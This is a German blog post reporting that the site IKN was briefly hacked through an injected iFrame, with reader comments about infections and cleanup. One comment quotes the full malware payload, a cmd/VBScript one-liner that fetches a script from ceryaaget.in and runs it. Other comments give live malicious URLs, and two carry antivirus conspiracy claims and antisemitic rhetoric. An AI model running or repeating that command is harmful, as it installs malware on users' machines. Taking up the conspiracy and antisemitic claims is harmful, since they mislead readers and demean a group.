Gehackt

Hi, wer in den letzten 2-3 Stunden auf IKN unterwegs war möge doch bitte (sofern er denn unter Windows unterwegs ist und seinen Webbrowser nicht mit NoScript oder ähnlichem schützt) den Virenscanner aktualisieren und drüber laufen lassen. Tatsächlich wurde IKN für ein paar Minuten “gehackt”, d.h. ein Angreifer hat es geschafft ein iFrame ins Layout einzubauen. Schuld ist schätzungsweise (wir tüfteln das noch aus) WordPress.

Wir bitten die evtl. entstandenen Unannehmlichkeiten zu entschuldigen. Derartige Angriffe sind bei uns an der Tagesordnung, und irgendwann musste ja mal einer durchkommen. grtz, anx


57 Responses to Gehackt

  1. Uriel sagt:

    Falls es hilft…heute 17h:

    Beim Zugriff auf Daten der URL “http://ceryaaget.in/content/sp30.jar”
    wurde ein Virus oder unerwünschtes Programm ‘EXP/2010-0094.AK’ [exploit] gefunden.
    Durchgeführte Aktion: Der Zugriff auf die Datei wurde blockiert

  2. sternenstaub sagt:

    Hallo Rock
    einen 2. rechner hab ich noch, nun habe ich den spy checken lassen und der der hat einiges gefunden, als ich das entfernen wollte , kam die meldung, das er das nicht machen koennte, weil das mein system schaedigen wuerde .
    irgendwas mit win .ii. so irgendwas .
    ratlos bin ich jetzt alle mal .
    lg
    helga

  3. achmedius sagt:

    bei mir machts keine probleme mehr, hab mit dem malewarescanner den troyaner exp… auch entdeckt,
    bei witerer recherche gelesen das das ein javaproblem ist hab dann java runtergeschmissen, neuste version geladen rechner runtergefahren, wieder hoch, dann hats nochmal gepipst, rechner wieder aus, jetzt zwei stunden später keine reaktion von antivir mehr, hoffe ich werde jetzt nicht total überwacht, ach ja werden wir ja eh schon,
    muss schnell kochen,
    bis gleich

  4. Frank H. sagt:

    Dann treten wir mal diesen Trojanerschweinen in den After die Stiefelspitzen rein.
    Band Zeitlos. “Gegen den Strom”
    http://www.youtube.com/watch?v=BFNfbPOtEEY
    Band Zeitlos. “Die Büchse der Pandorra”
    http://www.youtube.com/watch?v=CiIgdiRSgFg

  5. Frank H. sagt:

    Hört das ganze Album der Band an! Ein Must Have. Danke.

  6. lass die systemrelevante ;-) datei zuerst mal noch drinn, die ist eh schon ins system rein und wirst so leicht nicht los.

    versuchs mal zuerst mit http://www.hijackthis.de/de um überhaupt zu wissen was an deinem system so rumläuft.

    oder du googlest nach deiner win.ii dann findest du massig anleitungen ob und wie du den trojaner wieder los wirst.

    evtl. musst du den trojaner im F8 win-abgesicherten modus entfernen.

    wünsche dir viel erfolg dabei.

  7. anju sagt:

    werd ich machen, sehr interessant. danke für den tip

  8. Frank H. sagt:

    Zeitlos. Zweite Chance. Klasse Band, das ist TEXT und kommt von einer aufgeweckten Jugend.
    http://www.youtube.com/watch?v=HgRigO40hpA

  9. anju sagt:

    @ frank zu zeitlos…

  10. Frank H. sagt:

    @anju. Naja, ER ist schon immer zeitlos IN gewesen…ok?^^

    Das Album wurde heute hochgeladen. Und ich fall prompt drüber, hab ganz was anderes gesucht.
    *Er gibt Seele und Geist, wie Herz und Verstand*

  11. Sundance sagt:

    Einem Scanner aus Deutschland oder USA/England/Israel würde ich nie wieder installieren.
    Die schicken selbst die Viren los, damit Du den update machst. Um bei gelegenheit nach Schlüsselwörtern zu suchen. Der Update ist schon der Trojaner.

    Nee, nehmt den rising antivbir und firewall, emailscan usw. aus China. Niedlicher Löwe, wenn der was findet macht er shopsui draus.
    Sind alle umsonst, denke nur der internet security kostet.

    http://www.rising-global.com/Download/Home-Home-Office/Rising-Internet-Security-2011.html

    Und mal aufräumen mit wise cleaner, die unteren 3 sind umsonst.

    http://wisecleaner.com/download.html

  12. Sundance sagt:

    Dieser regcleaner ist auch gut, wenn auch schon älter.2007 lezter update.

    Nach Installation Sprache auswählen.
    und dann nur tools verwenden>>> clean REG all
    (nie die Hardware zurücksetzen!)

    http://regcleaner.en.softonic.com/download

    Unten über dem blauen Strich der kleine alternativ link.

    Wenn Du wissen willst, was alles auf dem PC läuft, nimm autoruns.
    Da kann man leicht ein Häkchen entfernen und wenn dann was nicht geht, setzt Du es neu.
    rechtsklick bringt dich sofort ins Internet und erklärt dir um was es sich handelt.
    Sehr gutes tool, eins der besten.

    http://www.filehippo.com/download_autoruns/download/4034ff917b7a1c86058c9618fa4d1ba5/

  13. Sundance sagt:

    Wer Firefox hat, das Icon firefox.exe von Programme in neuen Ordner kopieren und umbenennen in , denk Dir was aus. So wird der nicht sofort erkannt.
    Firefox 4x so schnell machen:
    about:config

    scroll down bis ; network.http.pipelining.maxrequest (von 4 auf 16 setzen)
    der link dadrüber : network.http.pipelining (von false auf true setzen) browser schliessen.

    Habe noch 3 wichtige andere gute tunes für die config.

    Mit rechtsclick neu einfügen über integer und auf 500000setzen.

    content.notify.interval;500000
    + den Boolean auf true:content.notify.ontimer;true

    wer die anderen haben will muss bescheid sagen.

  14. sternenstaub sagt:

    Ich noch mal :
    heute bekam ich eine Serie an emails von den deutschen Kontakten :
    das Problem war auch innerhalb Deutschlands, oder ist es noch , das scheint nicht nur ein HackProblem von IKN zu sein, sondern irgendetwas mit den deutschen Emailanbietern .
    Die kamen wohl mit dem Nachlesen der Mails in der Vorratsdatenspeicherung nicht mehr nach :-)

  15. anju sagt:

    bedrohung wurde blockiert

    feuerfuchs und avg

    migrateras.in/index.php?tp=89c9473171a1c848

  16. anju sagt:

    seltsam, kommentare funktionieren, rest siehe oben… hatte ich noch nie

  17. anx sagt:

    dann poste doch direkt die übersetzung :>

    cmd /c echo B=”l.vbs”:With CreateObject(“MSXML2.XMLHTTP”):.open “GET”,”http://ceryaaget.in/content/hcp_vbs.php?f=7f241&d=1″,false:.send():Set A = CreateObject(“Scripting.FileSystemObject”):Set D=A.CreateTextFile(A.GetSpecialFolder(2) + “\” + B):D.WriteLine .responseText:End With:D.Close:CreateObject(“WScript.Shell”).Run A.GetSpecialFolder(2) + “\” + B > %TEMP%\\l.vbs && %TEMP%\\l.vbs && taskkill /F /IM helpctr.exe

    pfui wa?

  18. Jens Blecker sagt:

    In den letzten Tagen scheint sich eh irgendwas mit dem Web abzuspielen. Etliche Leute berichten von Problemen und lags beim normalen Surfen etc.

  19. Sundance sagt:

    Wir sollten uns eh angewöhnen die Schlüsselwörter(jeder möge die für sich entscheiden), absichtlich falsch schreiben, aber bitte so das Jeder noch weiss was damit gemeint ist.

    Kazzaren z.B. die Wischer

  20. Sundance sagt:

    Hatte das übriegens schon vor gut 6 Monaten empfohlen.
    Wenn man über den Kriiieg der neeu-en Welttodnung schreibt, sollte mandie Syoniesten nicht immer zu deutlich darin vorheben. Die ja nicht identisch mit den Jhuden sind, sondern eher der Kaabale des Papsstes entsprechen.

  21. Sundance sagt:

    Ok die Wikser

  22. Sundance sagt:

    Nehmt ixquick, besorgt euch die IPs eurer Seiten; legt ein word doc an den Namen der Seite dahinter die Ip.
    kopiert die IP in browser, dann läuft das nicht über den DNS.

  23. anx sagt:

    wisst du da nicht deine hosts datei mit füttern?

    bei XP ff. in: “%SystemRoot%\system32\drivers\etc\hosts”
    linux: /etc/hosts

    78.46.64.217 iknews.de

    siehe auch: http://de.wikipedia.org/wiki/Hosts-Datei

  24. Newsticker2012 sagt:

    Bestätige auch mal 2 kleine Viren auf meinem PC.

    1 Adware/InstallCor.A Malware Level 1 09.08.2012 06.06.2012
    2 Adware/Rogue.141312 Malware Level 1 08.08.2012 06.08.2012

Hinterlasse eine Antwort